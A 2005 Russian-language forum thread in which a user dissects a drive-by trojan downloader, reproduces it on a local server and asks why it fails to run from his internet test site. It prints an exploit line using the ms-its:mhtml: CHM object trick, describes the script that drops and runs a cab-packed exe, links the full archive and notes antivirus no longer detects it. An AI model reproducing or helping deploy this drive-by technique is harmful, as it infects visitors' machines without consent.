Запуск exe прямо с сайта

Discussion in 'Безопасность и Анонимность' started by vvs777, 10 Dec 2005.

  1. vvs777

    vvs777 Elder - Старейшина

    Joined:
    16 Nov 2004
    Messages:
    393
    Likes Received:
    212
    Reputations:
    4
    Когда-то подцепил вирус Mediket. Что он делает так и не понял, но появляется в виде каба в корне диска C. EXEшник из каба запускается.
    Потом еще пару раз цеплял другие его моды. Надоело мне все это, захотел разобраться как он ко мне попадает. Вот что нашел. На каком-то сайте лежит
    (как его обозвал Касперский) Trojan-downloader.JS.small.bp. Это просто яваскрипт, который в конечном итоге пишет строчку типа
    Code:
    <object data=  "ms-its:mhtml:file://C:cust20cust.mht!http://localhost/bomba.chm::/bomba.htm" type="text/x-scriptlet"></object>
    bomba.chm определяется как Trojan-downloader.JS.Psyme.bi
    в нем единственный файл bomba.htm, в котором находжится очень извращенный яваскрипт, одна часть которого грузит cab-архив в c:\, потом запускает через object, а другая получает имена всех подпапок из Temporary Internet files и пробует запустить другой архив из каждой.
    В архиве лежит exe-шник и инф-файл, запускающий его.
    Кстати, все названия файлов выглядели типа eied_s7.chm итп, я их заменил. Сайт заменил на локалхост.
    ====
    Так вот. Поставил себе самописный сервак на делфи, открываю страницу http://localhost/launch.htm в IE. Все в порядке, через пару секунд запускается программа на делфи (окно и кнопка, по которой зацикливание).
    Значит, код работает. Аналогично когда localhost заменен на ip соседнего компа сети.
    Когда я поменял везде localhost на мой тест-сайт develop.hut1.ru, пытаюсь запустить все это из интернета, нифига не запускается. Кажется, дело не доходит до chm-файла.
    Может, кто-то увидит, из-за чего?
    Код все таки интересный. Заходишь на сайт и тебе сразу троян. И каспер уже не палит.

    Архив с этой байдой КАЧАТЬ ТУТ
    PS: Использовался cabarc.exe, блокнот, IE, htm2chm, Delphi и может что забыл.
     
    #1 vvs777, 10 Dec 2005
    Last edited: 10 Dec 2005
  2. vvs777

    vvs777 Elder - Старейшина

    Joined:
    16 Nov 2004
    Messages:
    393
    Likes Received:
    212
    Reputations:
    4
    Глухо. Может, не в тот раздел кинул?
     
  3. Dread

    Dread Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    28
    Likes Received:
    2
    Reputations:
    0
    кажется из-за!

    кажется из-за "file://" если его убрать на localhost'e то exe и тут не запустится!!!
     
  4. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,191
    Likes Received:
    727
    Reputations:
    266
    теоретически никак
     
  5. vvs777

    vvs777 Elder - Старейшина

    Joined:
    16 Nov 2004
    Messages:
    393
    Likes Received:
    212
    Reputations:
    4
    Не, я гарантирую что это должно работать. С того американского сервака этот вирусяка мне же приплыл когда-то? И file там вроде не должен быть...